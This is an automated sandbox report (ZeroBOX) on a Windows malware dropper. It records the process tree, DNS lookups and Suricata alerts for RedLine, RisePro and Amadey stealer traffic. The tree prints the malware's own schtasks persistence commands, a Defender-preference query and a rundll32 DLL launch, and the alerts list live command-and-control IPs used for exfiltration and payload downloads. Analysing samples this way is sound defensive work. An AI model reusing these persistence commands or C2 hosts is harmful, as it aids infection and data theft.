Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Jan. 5, 2024, 7:49 a.m.	Jan. 5, 2024, 7:51 a.m.

Size	2.2MB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`98e589da2cf91986d1e703189919dec1`
SHA256	`137a0704f360303dbaf6efaf66c07d4c74a8fe78b4eef1e67602081c9c2b740f`
CRC32	`50C963A2`
ssdeep	`49152:xhXkxroQ262hhbZo9zce8g3N7D37ghUdmku/wmhbe9ye9+:7XkOQ+fbS9LLZdGYm3e`
PDB Path	wextract.pdb
Yara	Malicious_Library_Zero - Malicious_Library IsPE32 - (no description) PE_Header_Zero - PE File Signature Win32_Trojan_Emotet_RL_Gen_Zero - Win32 Trojan Emotet Win32_Trojan_Gen_1_0904B0_Zero - Win32 Trojan Emotet CAB_file_format - CAB archive file UPX_Zero - UPX packed file

bongo.exe "C:\Users\test22\AppData\Local\Temp\bongo.exe"
1880
- Cm0Fo98.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\Cm0Fo98.exe
  940
  - 1SS26ZD8.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\1SS26ZD8.exe
    2076
    - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
      2140
      - iexplore.exe "C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:2140 CREDAT:145409
        2232
  - 2Fy3903.exe C:\Users\test22\AppData\Local\Temp\IXP001.TMP\2Fy3903.exe
    2348
    - powershell.exe "powershell" Get-MpPreference -verbose
      2504
    - cmd.exe "cmd.exe" /c schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
      2780
      - schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 HR" /sc HOURLY /rl HIGHEST
        2828
    - cmd.exe "cmd.exe" /c schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST
      2876
      - schtasks.exe schtasks /create /f /RU "test22" /tr "C:\ProgramData\OfficeTrackerNMP131\OfficeTrackerNMP131.exe" /tn "OfficeTrackerNMP131 LG" /sc ONLOGON /rl HIGHEST
        2920
- 7pB3Mq40.exe C:\Users\test22\AppData\Local\Temp\IXP000.TMP\7pB3Mq40.exe
  1044
  - explorhe.exe "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe"
    3040
    - schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explorhe.exe /TR "C:\Users\test22\AppData\Local\Temp\d887ceb89d\explorhe.exe" /F
      2856
    - nocry.exe "C:\Users\test22\AppData\Local\Temp\1000001001\nocry.exe"
      3000
      - powershell.exe "powershell" Get-MpPreference -verbose
        2568
    - golden.exe "C:\Users\test22\AppData\Local\Temp\1000004001\golden.exe"
      1896
      - RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        840
    - pixelguy.exe "C:\Users\test22\AppData\Local\Temp\1000006001\pixelguy.exe"
      2740
    - YT.exe "C:\Users\test22\AppData\Local\Temp\1000007001\YT.exe"
      2760
    - MRK.exe "C:\Users\test22\AppData\Local\Temp\1000009001\MRK.exe"
      2872
      - RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        3064
    - rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\test22\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
      2832
    - macheri.exe "C:\Users\test22\AppData\Local\Temp\1000010001\macheri.exe"
      2720
    - bakhtiar.exe "C:\Users\test22\AppData\Local\Temp\1000011001\bakhtiar.exe"
      1840
    - newrock.exe "C:\Users\test22\AppData\Local\Temp\1000013001\newrock.exe"
      2352
      - InstallSetup7.exe "C:\Users\test22\AppData\Local\Temp\InstallSetup7.exe"
        1868
        
        BroomSetup.exe C:\Users\test22\AppData\Local\Temp\BroomSetup.exe
        2264
        
        nsl6E4E.tmp C:\Users\test22\AppData\Local\Temp\nsl6E4E.tmp
        3036
      - 31839b57a4f11171d6abc8bbc4451ee4.exe "C:\Users\test22\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
        1176
      - tesaea.exe "C:\Users\test22\AppData\Local\Temp\tesaea.exe"
        2320
    - flesh.exe "C:\Users\test22\AppData\Local\Temp\1000018001\flesh.exe"
      2328
explorer.exe C:\Windows\Explorer.EXE
1236

Name	Response	Post-Analysis Lookup
iplogger.com	A 104.21.76.57 A 172.67.188.178	104.21.76.57
apps.identrust.com	A 121.254.136.9 CNAME a1952.dscq.akamai.net CNAME identrust.edgesuite.net A 121.254.136.18 A 23.32.56.72 A 23.32.56.80	23.67.53.27
ipinfo.io	A 34.117.186.192	34.117.186.192
api.ipify.org	A 173.231.16.77 A 64.185.227.156 CNAME api4.ipify.org A 104.237.62.212	173.231.16.77
fonts.gstatic.com	A 172.217.24.227	172.217.25.163
fonts.googleapis.com	A 216.58.220.138	172.217.25.170
www.youtube.com	A 142.251.222.206 A 142.250.66.46 A 142.251.220.78 A 216.58.203.78 A 142.251.220.110 A 142.250.66.142 A 142.250.66.78 A 216.58.200.238 A 142.250.204.142 A 142.251.220.14 A 142.251.220.46 A 142.250.207.78 A 172.217.24.110 A 142.250.66.110 CNAME youtube-ui.l.google.com A 142.251.130.14 A 172.217.24.78	172.217.175.14

IP Address	Status	Action
104.21.76.57	Active	Moloch
117.18.232.200	Active	Moloch
121.254.136.9	Active	Moloch
164.124.101.2	Active	Moloch
172.217.24.227	Active	Moloch
173.231.16.77	Active	Moloch
185.172.128.53	Active	Moloch
185.215.113.68	Active	Moloch
193.233.132.62	Active	Moloch
195.20.16.103	Active	Moloch
20.79.30.95	Active	Moloch
216.58.203.78	Active	Moloch
216.58.220.138	Active	Moloch
23.32.56.80	Active	Moloch
34.117.186.192	Active	Moloch
77.91.68.21	Active	Moloch
5.42.65.31	Active	Moloch
5.42.66.0	Active	Moloch
91.92.254.7	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49174 -> 216.58.203.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49171 -> 216.58.203.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49178 -> 216.58.220.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49170 -> 216.58.203.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49182 -> 172.217.24.227:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49179 -> 216.58.220.138:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49184 -> 216.58.203.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49183 -> 172.217.24.227:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49180 -> 216.58.203.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49181 -> 172.217.24.227:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49186 -> 216.58.203.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49185 -> 216.58.203.78:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49187 -> 172.217.24.227:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 185.215.113.68:80 -> 192.168.56.103:49217	2400020	ET DROP Spamhaus DROP Listed Traffic Inbound group 21	Misc Attack
TCP 193.233.132.62:50500 -> 192.168.56.103:49223	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49223 -> 193.233.132.62:50500	2049060	ET MALWARE Suspected RisePro TCP Heartbeat Packet	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.103:49195	2046266	ET MALWARE [ANY.RUN] RisePro TCP (Token)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49217 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 193.233.132.62:50500 -> 192.168.56.103:49195	2046267	ET MALWARE [ANY.RUN] RisePro TCP (External IP)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49230 -> 195.20.16.103:20440	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49197 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49197 -> 34.117.186.192:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.186.192:443 -> 192.168.56.103:49197	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 193.233.132.62:50500 -> 192.168.56.103:49195	2046267	ET MALWARE [ANY.RUN] RisePro TCP (External IP)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 20.79.30.95:13856 -> 192.168.56.103:49229	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49195 -> 193.233.132.62:50500	2046270	ET MALWARE [ANY.RUN] RisePro TCP (Exfiltration)	Malware Command and Control Activity Detected
TCP 193.233.132.62:50500 -> 192.168.56.103:49223	2046267	ET MALWARE [ANY.RUN] RisePro TCP (External IP)	Malware Command and Control Activity Detected
TCP 192.168.56.103:49220 -> 77.91.68.21:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49230 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49230 -> 195.20.16.103:20440	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 77.91.68.21:80 -> 192.168.56.103:49220	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 77.91.68.21:80 -> 192.168.56.103:49220	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.68.21:80 -> 192.168.56.103:49220	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 195.20.16.103:20440 -> 192.168.56.103:49230	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 185.215.113.68:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 192.168.56.103:49217 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49220 -> 77.91.68.21:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 77.91.68.21:80 -> 192.168.56.103:49220	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 77.91.68.21:80 -> 192.168.56.103:49220	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49220 -> 77.91.68.21:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49230 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 20.79.30.95:13856 -> 192.168.56.103:49229	2046056	ET MALWARE Redline Stealer Family Activity (Response)	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49220 -> 77.91.68.21:80	2017598	ET MALWARE Possible Kelihos.F EXE Download Common Structure	A Network Trojan was detected
TCP 192.168.56.103:49220 -> 77.91.68.21:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 77.91.68.21:80 -> 192.168.56.103:49220	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49231 -> 34.117.186.192:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49231 -> 34.117.186.192:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 34.117.186.192:443 -> 192.168.56.103:49231	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected
TCP 195.20.16.103:20440 -> 192.168.56.103:49230	2046056	ET MALWARE Redline Stealer Family Activity (Response)	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 185.215.113.68:80	2027250	ET INFO Dotted Quad Host DLL Request	Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.103:49217	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.215.113.68:80 -> 192.168.56.103:49217	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 185.215.113.68:80 -> 192.168.56.103:49217	2015744	ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging)	Misc activity
TCP 192.168.56.103:49220 -> 77.91.68.21:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49229 -> 20.79.30.95:13856	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49220 -> 77.91.68.21:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49217 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49244 -> 5.42.66.0:80	2017598	ET MALWARE Possible Kelihos.F EXE Download Common Structure	A Network Trojan was detected
TCP 192.168.56.103:49244 -> 5.42.66.0:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 5.42.66.0:80 -> 192.168.56.103:49244	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 5.42.66.0:80 -> 192.168.56.103:49244	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic
TCP 5.42.66.0:80 -> 192.168.56.103:49244	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
TCP 192.168.56.103:49230 -> 195.20.16.103:20440	2043231	ET MALWARE Redline Stealer TCP CnC Activity	A Network Trojan was detected
UDP 192.168.56.103:64530 -> 8.8.8.8:53	2047702	ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup	Misc activity
TCP 192.168.56.103:49252 -> 5.42.65.31:48396	2043233	ET INFO Microsoft net.tcp Connection Initialization Activity	Potentially Bad Traffic
TCP 192.168.56.103:49251 -> 173.231.16.77:80	2029622	ET POLICY External IP Lookup (ipify .org)	Potential Corporate Privacy Violation
TCP 192.168.56.103:49251 -> 173.231.16.77:80	2011227	ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))	Potentially Bad Traffic
TCP 192.168.56.103:49254 -> 91.92.254.7:80	2011227	ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))	Potentially Bad Traffic
TCP 192.168.56.103:49252 -> 5.42.65.31:48396	2046045	ET MALWARE [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)	A Network Trojan was detected
TCP 5.42.65.31:48396 -> 192.168.56.103:49252	2046056	ET MALWARE Redline Stealer Family Activity (Response)	A Network Trojan was detected
TCP 192.168.56.103:49256 -> 185.172.128.53:80	2011227	ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))	Potentially Bad Traffic
TCP 192.168.56.103:49256 -> 185.172.128.53:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 185.172.128.53:80 -> 192.168.56.103:49256	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 185.172.128.53:80 -> 192.168.56.103:49256	2021076	ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response	Potentially Bad Traffic
UDP 192.168.56.103:53658 -> 8.8.8.8:53	2047719	ET INFO External IP Lookup Domain (iplogger .com in DNS lookup)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49262 -> 104.21.76.57:443	2047718	ET INFO External IP Lookup Domain (iplogger .com in TLS SNI)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49262 -> 104.21.76.57:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49220 -> 77.91.68.21:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
TCP 192.168.56.103:49217 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49217 -> 185.215.113.68:80	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	A Network Trojan was detected
TCP 192.168.56.103:49220 -> 77.91.68.21:80	2016141	ET INFO Executable Download from dotted-quad Host	Potentially Bad Traffic
UDP 192.168.56.103:64530 -> 164.124.101.2:53	2047702	ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49171 216.58.203.78:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	5d:3a:d9:47:14:b0:78:30:a1:bf:b4:45:f6:f5:81:ad:0a:c7:76:89
TLSv1 192.168.56.103:49174 216.58.203.78:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	5d:3a:d9:47:14:b0:78:30:a1:bf:b4:45:f6:f5:81:ad:0a:c7:76:89
TLSv1 192.168.56.103:49178 216.58.220.138:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	10:d0:ed:9a:f4:53:c8:99:de:b6:5e:5c:04:e6:20:0b:68:7d:46:ec
TLSv1 192.168.56.103:49170 216.58.203.78:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	5d:3a:d9:47:14:b0:78:30:a1:bf:b4:45:f6:f5:81:ad:0a:c7:76:89
TLSv1 192.168.56.103:49182 172.217.24.227:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	5f:60:69:c9:59:6d:f1:b5:87:82:8d:b0:57:3c:d9:24:10:fd:74:d1
TLSv1 192.168.56.103:49179 216.58.220.138:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=upload.video.google.com	10:d0:ed:9a:f4:53:c8:99:de:b6:5e:5c:04:e6:20:0b:68:7d:46:ec
TLSv1 192.168.56.103:49184 216.58.203.78:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	5d:3a:d9:47:14:b0:78:30:a1:bf:b4:45:f6:f5:81:ad:0a:c7:76:89
TLSv1 192.168.56.103:49180 216.58.203.78:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	5d:3a:d9:47:14:b0:78:30:a1:bf:b4:45:f6:f5:81:ad:0a:c7:76:89
TLSv1 192.168.56.103:49181 172.217.24.227:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	5f:60:69:c9:59:6d:f1:b5:87:82:8d:b0:57:3c:d9:24:10:fd:74:d1
TLSv1 192.168.56.103:49185 216.58.203.78:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	5d:3a:d9:47:14:b0:78:30:a1:bf:b4:45:f6:f5:81:ad:0a:c7:76:89
TLSv1 192.168.56.103:49187 172.217.24.227:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	5f:60:69:c9:59:6d:f1:b5:87:82:8d:b0:57:3c:d9:24:10:fd:74:d1
TLSv1 192.168.56.103:49186 216.58.203.78:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.google.com	5d:3a:d9:47:14:b0:78:30:a1:bf:b4:45:f6:f5:81:ad:0a:c7:76:89
TLSv1 192.168.56.103:49183 172.217.24.227:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1C3	CN=*.gstatic.com	5f:60:69:c9:59:6d:f1:b5:87:82:8d:b0:57:3c:d9:24:10:fd:74:d1
TLS 1.2 192.168.56.103:49197 34.117.186.192:443	C=US, O=Let's Encrypt, CN=R3	CN=ipinfo.io	17:1f:d0:ef:80:aa:6c:99:b1:c4:56:90:ac:2c:8e:3d:e2:0f:6c:c2
TLS 1.2 192.168.56.103:49231 34.117.186.192:443	C=US, O=Let's Encrypt, CN=R3	CN=ipinfo.io	17:1f:d0:ef:80:aa:6c:99:b1:c4:56:90:ac:2c:8e:3d:e2:0f:6c:c2
TLS 1.2 192.168.56.103:49262 104.21.76.57:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=iplogger.com	58:f1:b8:44:37:6f:27:f8:01:6a:79:0e:7e:47:5b:b5:88:ec:1d:cc

Queries for the computername (50 out of 94 events)

Time & API	Arguments	Status	Return
GetComputerNameA Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Jan. 5, 2024, 7:50 a.m.	computer_name: TEST22-PC	1	1
